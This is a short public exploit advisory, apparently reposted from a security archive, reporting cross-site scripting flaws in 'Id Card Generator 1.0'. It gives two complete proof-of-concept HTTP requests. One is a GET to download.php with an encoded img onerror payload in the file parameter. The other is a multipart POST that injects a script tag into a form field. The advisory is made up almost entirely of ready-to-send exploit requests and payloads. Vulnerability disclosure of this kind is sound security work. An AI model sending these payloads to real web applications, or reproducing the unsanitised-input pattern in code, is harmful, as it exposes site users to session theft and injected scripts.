Id Card Generator 1.0 Cross Site Scripting

Id Card Generator version 1.0 suffers from multiple cross site scripting vulnerabilities.

MD5 | f28ea598bf9a391524ad5a07e3d3ecbc

Download

# Exploit Title: Id Card Generator | Cross Site Scripting 'download.php'
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

GET /id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E HTTP/1.1

Host: TARGET

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://TARGET/id-card/download.php?file=%22%3E%3Cimg%20src=x%20onerror=%22confirm(%27XSS%27)%22%3E

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0


## Payload: "><img src=x onerror="confirm('XSS')">

-------

# Exploit Title: Id Card Generator | Cross Site Scripting 
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/12040/id-generator-php.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12040&title=ID+Generator+in+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

POST /id-card/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11277759132085478021703975389
Content-Length: 466
Origin: http://localhost
Connection: close
Referer: http://localhost/id-card/
Upgrade-Insecure-Requests: 1

-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="visitornewm"

hello"><script>alert(`xss`)</script>
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="dateinput"

March 03, 2021
-----------------------------11277759132085478021703975389
Content-Disposition: form-data; name="process"

Generate ID
-----------------------------11277759132085478021703975389--

Source: packetstormsecurity.com